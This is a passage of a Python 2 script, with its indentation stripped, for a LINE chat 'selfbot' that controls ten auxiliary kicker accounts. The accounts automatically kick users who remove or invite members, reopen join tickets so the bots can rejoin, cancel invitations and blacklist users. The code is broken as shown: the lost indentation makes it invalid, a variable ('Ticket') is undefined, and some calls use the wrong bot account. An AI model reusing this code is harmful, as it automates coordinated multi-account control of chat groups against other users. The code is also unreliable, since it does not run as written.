Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid6:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid7:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid8:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid9:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Amid10:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid1:
if op.param2 in Amid2:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki1.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Amid2:
if op.param2 in Amid3:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Amid3:
if op.param2 in Amid4:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Amid4:
if op.param2 in Amid5:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Amid5:
if op.param2 in Amid6:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Amid6:
if op.param2 in Amid7:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Amid7:
if op.param2 in Amid8:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in Amid8:
if op.param2 in Amid9:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Amid9:
if op.param2 in Amid10:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.param3 in Amid10:
if op.param2 in Amid1:
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
#===========================================
if op.type == 32:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SELF BOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1, "Your invitation was declined\n\n[SEL FBOT\n[By.☬ARIFISTIFIK☬]]\n\nhttp://line.me/ti/p/arif.mh")
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid1 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
else:
ki1.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki1.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki1.cancelGroupInvitation(op.param1, matched_list)
if Amid2 in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
else:
ki2.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki2.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki2.cancelGroupInvitation(op.param1, matched_list)
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots:
if wait["protectionOn"] == True:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots:
if wait["protectionOn"] == True:
try:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl1.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.1)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl1.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl1.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots:
try:
gs = ki1.getGroup(op.param1)
gs = ki2.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki1.getGroup(op.param1)
G.preventJoinByTicket = False
ki1.updateGroup(G)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid1 in op.param3:
if op.param2 in Bots:
pass
try:
ki2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = True
ki1.updateGroup(X)
Ticket = ki1.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid2 in op.param3:
if op.param2 in Bots:
pass
try:
ki3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ticket = ki2.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid3 in op.param3:
if op.param2 in Bots:
pass
try:
ki4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid4 in op.param3:
if op.param2 in Bots:
pass
try:
ki5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid5 in op.param3:
if op.param2 in Bots:
pass
try:
ki6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid6 in op.param3:
if op.param2 in Bots:
pass
try:
ki7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ticket = ki6.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid7 in op.param3:
if op.param2 in Bots:
pass
try:
ki8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ticket = ki7.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid8 in op.param3:
if op.param2 in Bots:
pass
try:
ki9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = True
ki8.updateGroup(X)
Ticket = ki8.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid9 in op.param3:
if op.param2 in Bots:
pass
try:
ki10.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ticket = ki9.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid10 in op.param3:
if op.param2 in Bots:
pass
try:
ki1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ki1.getGroup(op.param1)
X.preventJoinByTicket = False
ki1.updateGroup(X)
Ti = ki1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki1.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
time.sleep(0.01)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = True
ki10.updateGroup(X)
